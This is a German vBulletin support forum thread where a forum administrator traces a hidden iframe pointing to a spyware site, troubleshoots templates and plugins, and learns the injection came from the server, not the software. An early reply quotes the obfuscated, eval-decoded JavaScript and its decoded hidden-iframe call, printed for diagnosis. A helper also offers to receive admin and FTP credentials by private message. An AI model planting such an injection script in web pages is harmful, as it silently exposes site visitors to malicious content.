Hallo,

seit eben passiert etwas komisches: Wenn ich unser Forum aufrufe, wird angezeigt, dass auch nach der Seite trust4free.ws gesucht wird, eine Spyware-Seite. Ist das ein Hack, wie kann so etwas passieren und was kann ich dagegen machen?

Das "Problem" wird durch dieses Script erzeugt:<script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy21(?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script>Daraus resultiert folgender Funktionsaufruf:document.write("<iframe style="display: none;" src="http://trust4free.ws/?id=index10" height="1" width="1"></iframe>");Es wird also ein iframe in den HTML-Quelltext geschrieben, der dann eben diese Seite aufruft.

Entferne das Script aus dem footer-Template, und du hast wieder Ruhe.

Hi,

ich bin im Backend unter "Styles verwalten" an das footer-Template gegangen und habe den o.g. Code aber nicht finden können. SO sieht der Code dort aus:

<br />
<div class="smallfont" align="center">$vbphrase[all_times_are_gmt_x_time_now_is_y]</div>
<br />

$spacer_close
<!-- /content area table -->

<form action="$vboptions[forumhome].php" method="get">

<table cellpadding="$stylevar[cellpadding]" cellspacing="0" border="0" width="$stylevar[outertablewidth]" class="page" align="center">
<tr>
<if condition="$show['quickchooser']">
<td class="tfoot">
<select name="styleid" onchange="switch_id(this, 'style')">
<optgroup label="$vbphrase[quick_style_chooser]">
$quickchooserbits
</optgroup>
</select>
</td>
</if>
<if condition="$show['languagechooser']">
<td class="tfoot">
<select name="langid" onchange="switch_id(this, 'lang')">
<optgroup label="$vbphrase[quick_language_chooser]">
$languagechooserbits
</optgroup>
</select>
</td>
</if>
<td class="tfoot" align="$stylevar[right]" width="100%">
<div class="smallfont">
<strong>
<if condition="$show['contactus']"><a href="$vboptions[contactuslink]" rel="nofollow">$vbphrase[contact_us]</a> -</if>
<a href="$vboptions[homeurl]">$vboptions[hometitle]</a> -
<if condition="$show['admincplink']"><a href="$admincpdir/index.php$session[sessionurl_q]">$vbphrase[admin]</a> -</if>
<if condition="$show['modcplink']"><a href="$modcpdir/index.php$session[sessionurl_q]">$vbphrase[mod]</a> -</if>
<if condition="$vboptions['archiveenabled']"><a href="archive/index.php">$vbphrase[archive]</a> -</if>
<if condition="$vboptions[privacyurl]"><a href="$vboptions[privacyurl]">$vbphrase[privacy_statement]</a> -</if>
<a href="#top" onclick="self.scrollTo(0, 0); return false;">$vbphrase[top]</a>
</strong>
</div>
</td>
</tr>
</table>

<br />

<div align="center">
<div class="smallfont" align="center">
<!-- Do not remove this copyright notice -->
$vbphrase[powered_by_vbulletin]
<!-- Do not remove this copyright notice -->
</div>

<div class="smallfont" align="center">
<!-- Do not remove $cronimage or your scheduled tasks will cease to function -->
$cronimage
<!-- Do not remove $cronimage or your scheduled tasks will cease to function -->

$vboptions[copyrighttext]
</div>
</div>

</form>

<if condition="$show['dst_correction']">
<!-- auto DST correction code -->
<form action="profile.php" method="post" name="dstform">
<input type="hidden" name="s" value="$session[sessionhash]" />
<input type="hidden" name="do" value="dst" />
</form>
<script type="text/javascript">
<!--
var tzOffset = $bbuserinfo[timezoneoffset] + $bbuserinfo[dstonoff];
var utcOffset = new Date().getTimezoneOffset() / 60;
if (Math.abs(tzOffset + utcOffset) == 1)
{ // Dst offset is 1 so its changed
document.forms.dstform.submit();
}
//-->
</script>
<!-- / auto DST correction code -->

</if>
<script type="text/javascript">
<!--
// Main vBulletin Javascript Initialization
vBulletin_init();
//-->
</script>

Oder habe ich da falsch gedacht?

Dann wird der Code vielleicht irgendwie anders eingefügt, oder ist in einem anderen Template.

Durchsuche mal die Templates danach, oder deaktiviere das Plugin-System komplett. Wenn dann der Code nicht mehr vorhanden ist, wird er von irgendeinem Plugin eingefügt.

Wenn du willst, kannst du mir auch die Daten von einem Admin-Account per PN zukommen lassen, dann schaue ich mal selbst nach.

Viele Grüße,
Stefan

Ich kann leider im AdminCP nichts finden. Es sind keine Ersetzungsvariablen definiert, die Templates sind original, und das Plugin-System ist ganz abgeschaltet - und selbst wenn es an wäre, gibt es nur ein Plugin, wo dieser Code aber nicht drinnen steht.

Der Code findet sich auf allen Seiten, bei denen dieses Script drinnen ist:<script type="text/javascript">
<!--
// Main vBulletin Javascript Initialization
vBulletin_init();
//-->
</script>er wird dann direkt danach angehängt. Bei manchen Seiten, wie z.B. http://www.rollingstone.de/forum/misc.php?do=whoposted&t=380 ist er aber nicht vorhanden.

Lade mal testweise einige vBulletin-Dateien erneut hoch, insbesondere die global.php und includes/init.php.
Wenn der Code dann immer noch da ist, dann kannst du mir auch mal die ftp-Daten schicken, dann schaue ich mir das auch noch an.

Viele Grüße,
Stefan

Kann ich die einfach so überschreiben?

Ja, kannst du einfach überschreiben (sofern du da nichts daran geändert hast).

Ich habe mal ein wenig gegoogelt, und diese Seite gefunden:
http://www.webhostingtalk.com/showthread.php?t=387710

Es könnte sein, dass sich auf deinem Server ein Virus tummelt... Ich habe mich noch nicht genauer eingelesen.

Viele Grüße,
Stefan

Hallo,

ich habe den Hoster angeschrieben und warte auf eine Antwort. Das Überspielen der Dateien versuche ich jetzt einfach mal. Melde mich.

Lieben Dank für das schnelle Bemühen.

So, es hat sich rausgestellt, dass unser geliebtes vBulletin unschuldig war - wie vermutet. :)